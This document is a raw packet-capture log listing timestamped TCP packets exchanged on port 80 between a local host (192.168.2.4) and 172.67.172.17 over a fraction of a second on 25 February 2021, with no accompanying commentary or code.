                                                                                                              Feb 25, 2021 15:10:00.276925087 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276940107 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276956081 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277002096 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277251959 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277312994 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277340889 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277369022 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277376890 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277414083 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277437925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277463913 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277487993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277510881 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277520895 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277549028 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277555943 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277578115 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277616024 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.277914047 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277934074 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277952909 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277968884 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.277985096 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.278001070 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278022051 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.278037071 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278055906 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278084993 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.278105974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278126955 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.278147936 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308454990 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308481932 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308505058 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308526039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308545113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308564901 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308587074 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308605909 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308625937 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308650017 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308659077 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308687925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308703899 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308723927 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308736086 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308758974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308784962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308811903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308819056 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308840990 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308854103 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308872938 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308893919 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308917046 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308927059 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308948994 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.308965921 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.308998108 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309019089 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309042931 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309051991 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309073925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309096098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309102058 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309135914 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309262037 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309282064 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309300900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309325933 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309350014 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309360981 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309401035 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309408903 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309437990 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309449911 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309472084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309503078 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309520006 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309554100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309576035 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309597969 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309607029 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309628963 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309654951 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309663057 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309683084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309703112 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.309714079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309736013 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.309757948 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310209036 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310239077 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310267925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310291052 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310318947 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310336113 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310362101 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310391903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310425043 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310437918 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310470104 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310489893 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310522079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310554981 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310575962 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310616970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310642958 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310669899 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310686111 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310718060 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310743093 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310762882 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310795069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310813904 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.310838938 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.310897112 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311130047 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311157942 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311186075 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311214924 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311255932 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311264992 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311305046 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311315060 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311357975 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311376095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311404943 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311433077 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311465025 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311472893 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311511040 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311523914 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311553001 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311582088 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311609030 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311623096 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311651945 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311671019 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.311693907 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311743021 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.311758041 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312174082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312200069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312226057 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312282085 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312299013 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312335014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312345028 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312376022 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312392950 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312421083 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312453985 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312488079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312498093 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312526941 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312541008 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312568903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312597036 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312623024 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312638998 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312669039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312690973 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312711000 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312740088 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312764883 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312782049 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.312848091 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.312995911 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313023090 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313054085 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313082933 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313103914 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313126087 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313138962 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313168049 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313203096 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313234091 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313254118 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313277960 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313288927 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313318014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313355923 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313374043 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313452959 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313478947 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313513041 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313520908 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313549995 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313568115 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.313594103 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313622952 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.313648939 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314019918 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314045906 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314074039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314090014 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314116955 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314131975 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314157963 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314188957 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314218044 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314229965 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314259052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314282894 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314302921 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314332008 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314362049 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314374924 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314402103 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314415932 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314450026 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314496040 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314522028 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314759970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314809084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314826965 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314857006 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314886093 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314905882 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.314927101 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314955950 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.314974070 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315010071 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315040112 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315057993 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315083981 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315114021 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315136909 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315159082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315191984 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315212011 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315241098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315270901 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315287113 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315311909 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315341949 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315360069 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315382004 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315428019 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315656900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315694094 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315753937 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315763950 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315795898 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315826893 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315857887 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315885067 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315902948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315923929 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.315943003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.315972090 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316001892 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316015005 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316042900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316067934 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316098928 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316129923 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316148996 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316173077 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316201925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316220999 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316242933 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316272020 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316289902 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316554070 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316586018 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316617012 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316634893 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316688061 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316704988 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316734076 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316761971 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316795111 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316804886 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316836119 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316852093 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316878080 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316909075 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316931009 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.316952944 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.316983938 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317002058 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317032099 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317065954 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317081928 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317439079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317471027 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317506075 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317514896 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317548990 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317565918 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317591906 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317620993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317646027 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317666054 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317694902 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317720890 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317765951 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317797899 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317826033 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317842960 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317871094 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317894936 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317912102 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317940950 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.317965984 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.317986012 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318017006 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318041086 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.318063021 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318109989 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.318248034 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318276882 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318329096 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318347931 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.318376064 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.318408966 CET8049722172.67.172.17192.168.2.4
